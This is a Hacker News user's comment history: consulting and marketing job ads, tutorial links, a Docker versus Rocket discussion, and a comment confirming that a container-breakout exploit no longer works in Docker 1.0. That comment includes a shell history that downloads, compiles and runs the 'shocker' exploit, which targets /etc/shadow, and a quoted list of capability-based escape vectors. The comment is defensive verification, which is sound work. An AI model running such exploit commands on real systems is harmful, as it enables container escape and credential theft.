Hacker Newsnew | past | comments | ask | show | jobs | submit | bastichelaar's commentslogin

Skyworkz (https://skyworkz.nl) | Cloud Architect/Developer/Engineer | The Netherlands | Full-time | ONSITE

Ever wondered how our job will look like in 5 years from now? What will happen if we apply AI to infrastructure and CI/CD? How to implement Chaos Engineering in production? We do. We're always looking ahead. If you like to help customers innovate, then we should talk. We are looking to hire Cloud Architects, Cloud Developers and Cloud Engineers.

Skyworkz is a small consulting firm based in Utrecht, The Netherlands, and we're looking to expand our team. Currently we are with 10 consultants, growing to a maximum of 25. We explicitly want to stay a small boutique consultancy. Technologies we work with are the Big Three (AWS, GCP, Azure), Kubernetes, CI/CD, DevOps (culture and technology).

Interested? Drop me an email at bas@skyworkz.nl


I like the hands-on tutorials of Instruqt: https://instruqt.com/public/topics/getting-started-with-kube.... They also got quite a few on Knative.

Disclaimer: I worked for Instruqt and created some of these tutorials.


Skyworkz | https://skyworkz.nl | Cloud/DevOps engineers & developers | ONSITE | Utrecht, The Netherlands

We are Skyworkz, a consulting firm focused on cloud native engineering and development. We are looking for cloud engineers and developers with experience in AWS/Azure/GCP and Kubernetes who want to make impact. Current customers are Nike, Jumbo, Port of Rotterdam and more.

So why are we different? Well, first of all both directors are technical. They were consultants themselves. Secondly, we want to stay small. Maximum 25 people. So you will always know everyone in the company without feeling like a number. And thirdly, we focus on learning. Get you the right assignments, help you become a better consultant.

More about Skyworkz: https://skyworkz.nl or mail bas(@)skyworkz.nl.


Are you open to remote work?


Instruqt | The Netherlands (Hilversum) | Marketing role | Full-time ONSITE | https://instruqt.com

Instruqt makes learning of technology more fun. By solving hands-on challenges on real infrastructure, we teach developers in Cloud, DevOps and Data. With the Engine, companies can add their own (private) content as well.

The team is growing, and we need more marketing power. If you have affinity with IT and learning, and have experience in in-bound, worldwide marketing, we should meet.

Contact me at bas[at]instruqt.com. We have good coffee in Hilversum!


Learn DevOps, Cloud and automation by solving challenges: https://instruqt.com


Vamp is awesome! It fits really nice into Kubernetes.


Docker's main focus is to "get people agree on something". And they are doing great in getting traction and adoption. But if everyone starts to create their own flavor of containers, we still don't get portability across servers and clouds. It would be better IMHO if Rocket implements the Docker API, or if they collaborate together in creating a minimal standard. Then everyone would benefit. I'm really curious how Solomon will respond to this...


FWIW, part of the design difference is that rocket doesn't implement an API. When you do `rkt run` it is actually executing under that PID hierarchy; there is no rktd that forks the process.

This is a design goal so that you can launch a container under the control of your init system or other process management system.


In case you change your mind, I just created this awesome project: https://github.com/fsouza/go-rocketclient


That's really too bad, because the only way for me to spawn containers programmatically is shelling out.


Forking, not shelling out, no?


This was a key principle of LMCTFY, too, FWIW.



Thanks!



Apparently this is already fixed in Docker 1.0:

  Its fixed in docker 1.0 since CAP_DAC_READ_SEARCH is no longer available.

  Other FS-related threats to container based VMM's that have been discussed:

  - subvolume related FS operations (snapshots etc)
  - FS ioctl's that accept FS-handles as well (XFS)
  - CAP_DAC_READ_SEARCH also defeats chroot and other
    bind-mount containers (privileged LXC)
  - CAP_MKNOD might be a problem too (still available in docker 1.0) depending on the drivers available in the kernel
Source: http://seclists.org/oss-sec/2014/q2/565


Confirmed not working in Docker 1.0:

  root@377a6f4ab0a4:/# history
  10  wget http://stealth.openwall.net/xSports/shocker.c  
  11  cc -Wall -std=c99 -O2 shocker.c -static
  12  apt-get install build-essential
  13  cc -Wall -std=c99 -O2 shocker.c -static
  14  cc -Wall -std=c99 -O2 shocker.c -static -Wno-unused-result
  15  ls
  16  ./shocker
  17  shocker
  18  nano a.out
  19  cat a.out
  20  ./a.out
  21  history
  root@377a6f4ab0a4:/# ./a.out
  [***] docker VMM-container breakout Po(C) 2014           
  [***]
  [***] The tea from the 90's kicks your sekurity again.     [***]
  [***] If you have pending sec consulting, I'll happily     [***]
  [***] forward to my friends who drink secury-tea too!      [***]
  <enter>
  [*] Resolving 'etc/shadow'
  [-] open_by_handle_at: Operation not permitted
  root@377a6f4ab0a4:/# uname -r
  3.14.1-tinycore64


SEEKING WORK, remote or in Amsterdam, The Netherlands

  I need some side jobs to pay my bills while working on my startup.
Linux system administrator / Python software developer

  10+ years of experience with Linux mixed with commercial skills. 
  1.5 year experience in Python development
System administration skills:

  * clustering (OpenStack, Ganeti)

  * high availability (Keepalived, Pacemaker)

  * office automation (Linux, Samba, CUPS)

  * all possible server configurations: mailservers, DNS, etc.
Programming skills:

  * Still junior, coming from system administration

  * Mostly backend, Python, Django

  * A bit frontend: Javascript, jQuery, HTML5/CSS3
Other skills: sales, marketing, SEO, SEA

Contact me at mail@bastichelaar.com. I live in Amsterdam.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: